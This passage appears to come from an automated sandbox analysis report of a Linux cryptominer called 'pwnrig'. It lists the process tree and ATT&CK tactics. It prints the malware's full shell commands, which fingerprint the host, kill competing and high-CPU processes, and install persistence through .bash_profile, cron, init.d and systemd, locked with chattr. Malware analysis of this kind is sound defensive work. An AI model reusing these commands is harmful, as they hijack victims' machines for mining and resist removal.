      PID:3863
  - - /bin/awk
      awk "{print \$1}"
      4⤵
      PID:3865
  - - /bin/cat
      cat /etc/ssh/sshd_config
      4⤵
      PID:3867
  - - /bin/grep
      grep "Port "
      4⤵
      PID:3868
  - - /bin/head
      head -n 1
      4⤵
      PID:3869
  - - /bin/awk
      awk "{print \"-\"\$2}"
      4⤵
      PID:3870
  - - /bin/whoami
      whoami
      4⤵
      PID:3871
  - - /bin/hostname
      hostname
      4⤵
      PID:3872
  - - /bin/grep
      grep -c "^processor" /proc/cpuinfo
      4⤵
      Checks CPU configuration
      PID:3873
  - - /bin/grep
      grep -m 1 "model name" /proc/cpuinfo
      4⤵
      Checks CPU configuration
      PID:3876
  - - /bin/cut
      cut -d: -f2
      4⤵
      PID:3877
  - - /bin/sed
      sed -e "s/^ *//"
      4⤵
      PID:3878
  - - /bin/sed
      sed -e "s/\$//"
      4⤵
      PID:3879
  - - /bin/awk
      awk "{print \$1}"
      4⤵
      PID:3882
  - - /bin/awk
      awk "{print \$4}"
      4⤵
      PID:3885
  - - /bin/awk
      awk "{print \$4}"
      4⤵
      PID:3888
  - - /bin/awk
      awk "{print \$3}"
      4⤵
      PID:3891
  - - /bin/awk
      awk "{print \$4}"
      4⤵
      PID:3894
  - - /bin/awk
      awk "{print \$1}"
      4⤵
      PID:3897
  - - /bin/awk
      awk "{print \$2\" \"\$3\" \"\$4}"
      4⤵
      PID:3899
- - /bin/sh
    sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
    3⤵
    PID:3900
  - - /bin/ps
      ps -A "-ostat,ppid"
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:3901
  - - /bin/awk
      awk "/[zZ]/ && !a[\$2]++ {print \$2}"
      4⤵
      PID:3902
  - - /bin/id
      id -u
      4⤵
      PID:3904
  - - /bin/grep
      grep /etc/cron
      4⤵
      PID:3906
  - - /bin/ps
      ps x
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:3905
  - - /bin/grep
      grep -v grep
      4⤵
      PID:3907
- - /bin/sh
    sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
    3⤵
    PID:3909
  - - /bin/id
      id -u
      4⤵
      PID:3910
  - - /bin/ps
      ps aux
      4⤵
      Checks CPU configuration
      Reads CPU attributes
      Enumerates kernel/hardware configuration
      Reads runtime system information
      PID:3911
  - - /bin/grep
      grep -v grep
      4⤵
      PID:3912
  - - /bin/grep
      grep -v -- "-bash[[:space:]]*\$"
      4⤵
      PID:3913
  - - /bin/grep
      grep -v /usr/sbin/httpd
      4⤵
      PID:3914
  - - /bin/awk
      awk "{if(\$3>30.0) print \$2}"
      4⤵
      PID:3915
- - /bin/sh
    sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"
    3⤵
    PID:3917
  - - /bin/id
      id -u
      4⤵
      PID:3918
  - - /bin/ps
      ps aux
      4⤵
      Checks CPU configuration
      Reads CPU attributes
      Reads runtime system information
      PID:3920
  - - /bin/grep
      grep -v grep
      4⤵
      PID:3921
  - - /bin/grep
      grep -- "-bash[[:space:]]*\$"
      4⤵
      PID:3922
  - - /bin/awk
      awk "{if(\$3>30.0) print \$2}"
      4⤵
      PID:3923
  - - /bin/wc
      wc -l
      4⤵
      PID:3924
- /tmp/-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
  /tmp/-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn
  2⤵
  - Executes dropped EXE
  - Checks hardware identifiers (DMI)
  - Reads hardware information
  - Checks CPU configuration
  - Reads CPU attributes
  - Enumerates kernel/hardware configuration
  PID:3925
- - /bin/sh
    sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
    3⤵
    - Attempts to change immutable files
    PID:3926
  - - /bin/hostname
      hostname -I
      4⤵
      Attempts to change immutable files
      PID:3929
  - - /bin/awk
      awk "{print \$1}"
      4⤵
      PID:3931
  - - /bin/cat
      cat /etc/ssh/sshd_config
      4⤵
      PID:3933
  - - /bin/grep
      grep "Port "
      4⤵
      PID:3934
  - - /bin/head
      head -n 1
      4⤵
      PID:3935
  - - /bin/awk
      awk "{print \"-\"\$2}"
      4⤵
      PID:3936
  - - /bin/whoami
      whoami
      4⤵
      PID:3937
  - - /bin/hostname
      hostname
      4⤵
      PID:3938
  - - /bin/grep
      grep -c "^processor" /proc/cpuinfo
      4⤵
      Checks CPU configuration
      PID:3939
  - - /bin/grep
      grep -m 1 "model name" /proc/cpuinfo
      4⤵
      Checks CPU configuration
      PID:3942
  - - /bin/cut
      cut -d: -f2
      4⤵
      PID:3943
  - - /bin/sed
      sed -e "s/^ *//"
      4⤵
      PID:3944
  - - /bin/sed
      sed -e "s/\$//"
      4⤵
      PID:3945
  - - /bin/awk
      awk "{print \$1}"
      4⤵
      PID:3948
  - - /bin/awk
      awk "{print \$4}"
      4⤵
      PID:3951
  - - /bin/awk
      awk "{print \$4}"
      4⤵
      PID:3954
  - - /bin/awk
      awk "{print \$3}"
      4⤵
      PID:3957
  - - /bin/awk
      awk "{print \$4}"
      4⤵
      PID:3960
  - - /bin/awk
      awk "{print \$1}"
      4⤵
      PID:3963
  - - /bin/awk
      awk "{print \$2\" \"\$3\" \"\$4}"
      4⤵
      PID:3965
- - /bin/sh
    sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
    3⤵
    PID:3966
  - - /bin/ps
      ps -A "-ostat,ppid"
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:3967
  - - /bin/awk
      awk "/[zZ]/ && !a[\$2]++ {print \$2}"
      4⤵
      PID:3968
  - - /bin/id
      id -u
      4⤵
      PID:3970
  - - /bin/ps
      ps x
      4⤵
      Reads CPU attributes
      Enumerates kernel/hardware configuration
      Reads runtime system information
      PID:3971
  - - /bin/grep
      grep /etc/cron
      4⤵
      PID:3972
  - - /bin/grep
      grep -v grep
      4⤵
      PID:3973
- - /bin/sh
    sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"
    3⤵
    - Attempts to change immutable files
    - Writes file to tmp directory
    PID:3975
  - - /bin/id
      id -u
      4⤵
      PID:3976
  - - /bin/id
      id -u
      4⤵
      PID:3977
  - - /bin/chattr
      chattr -i -a /bin/bprofr "~/.bash_profile"
      4⤵
      Attempts to change immutable files
      PID:3978
  - - /bin/rm
      rm -rf /bin/bprofr
      4⤵
      PID:3979
  - - /bin/sed
      sed -i /bprofr/d "~/.bash_profile"
      4⤵
      Attempts to change immutable files
      PID:3980
  - - /bin/cp
      cp -f -r -- /tmp/-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b /bin/bprofr
      4⤵
      Writes file to system bin folder
      PID:3981
  - - /bin/id
      id -u
      4⤵
      PID:3982
  - - /bin/chattr
      chattr +i +a /bin/bprofr "~/.bash_profile"
      4⤵
      Attempts to change immutable files
      PID:3983
  - - /bin/mkdir
      mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly
      4⤵
      PID:3984
  - - /bin/chattr
      chattr -i -a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
      4⤵
      Attempts to change immutable files
      PID:3985
  - - /bin/rm
      rm -rf /bin/crondr
      4⤵
      PID:3986
  - - /bin/cp
      cp -f -r -- /tmp/-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b /bin/crondr
      4⤵
      Writes file to system bin folder
      PID:3987
  - - /bin/tee
      tee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig
      4⤵
      Creates/modifies Cron job
      PID:3989
  - - /bin/sed
      sed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig
      4⤵
      Attempts to change immutable files
      Creates/modifies Cron job
      PID:3990
  - - /bin/chmod
      chmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
      4⤵
      PID:3991
  - - /bin/chattr
      chattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
      4⤵
      Attempts to change immutable files
      PID:3992
  - - /bin/which
      which chkconfig
      4⤵
      PID:3993
  - - /bin/which
      which update-rc.d
      4⤵
      PID:3994
  - - /bin/chattr
      chattr -i -a /etc/init.d/pwnrig /bin/initdr
      4⤵
      Attempts to change immutable files
      PID:3995
  - - /sbin/update-rc.d
      update-rc.d -f pwnrig disable
      4⤵
      PID:3996
    - - /bin/systemctl
        
        systemctl "--root=/" --quiet disable pwnrig
        5⤵
        
        PID:3997
    - - /bin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:3998
  - - /sbin/update-rc.d
      update-rc.d -f pwnrig remove
      4⤵
      PID:4121
    - - /bin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:4122
  - - /bin/rm
      rm -rf /bin/initdr
      4⤵
      PID:4245
  - - /bin/cp
      cp -f -r -- /tmp/-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b /bin/initdr
      4⤵
      Writes file to system bin folder
      PID:4246
  - - /bin/tee
      tee /etc/init.d/pwnrig
      4⤵
      Modifies init.d
      PID:4248
  - - /bin/sed
      sed -i "1 s/-e //" /etc/init.d/pwnrig
      4⤵
      Attempts to change immutable files
      Modifies init.d
      PID:4249
  - - /bin/chmod
      chmod +x /etc/init.d/pwnrig /bin/initdr
      4⤵
      PID:4250
  - - /sbin/update-rc.d
      update-rc.d pwnrig defaults
      4⤵
      PID:4251
    - - /bin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:4252
  - - /sbin/update-rc.d
      update-rc.d pwnrig enable
      4⤵
      PID:4375
    - - /bin/systemctl
        
        systemctl "--root=/" --quiet enable pwnrig
        5⤵
        
        PID:4376
    - - /bin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:4377
  - - /bin/chattr
      chattr +i +a /etc/init.d/pwnrig /bin/initdr
      4⤵
      Attempts to change immutable files
      PID:4500
  - - /bin/which
      which systemctl
      4⤵
      PID:4501
  - - /bin/chattr
      chattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr
      4⤵
      Attempts to change immutable files
      PID:4502
  - - /bin/rm
      rm -rf /bin/sysdr
      4⤵
      PID:4503
  - - /bin/cp
      cp -f -r -- /tmp/-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b /bin/sysdr
      4⤵
      Writes file to system bin folder
      PID:4504
  - - /bin/tee
      tee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service
      4⤵
      Modifies systemd
      PID:4506
  - - /bin/sed
      sed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service
      4⤵
      Attempts to change immutable files
      PID:4507
  - - /bin/chattr
      chattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr
      4⤵
      Attempts to change immutable files
      PID:4508
  - - /bin/systemctl
      systemctl enable pwnrige.service
      4⤵
      PID:4509
  - - /bin/systemctl
      systemctl enable pwnrigl.service
      4⤵
      PID:4632
  - - /bin/systemctl
      systemctl daemon-reload
      4⤵
      PID:4758
  - - /bin/systemctl
      systemctl reload-or-restart pwnrige.service
      4⤵
      PID:4886
- /tmp/-python37-89b070bb-bda2-479e-b1ab-1879f1acb90c
  /tmp/-python37-89b070bb-bda2-479e-b1ab-1879f1acb90c
  2⤵
  - Executes dropped EXE
  - Writes file to tmp directory
  PID:4943

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Persistence

Boot or Logon Autostart Execution

Hijack Execution Flow

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

Hijack Execution Flow

Scheduled Task/Job

Defense Evasion

Hijack Execution Flow

Virtualization/Sandbox Evasion

Credential Access

Discovery

System Information Discovery

Virtualization/Sandbox Evasion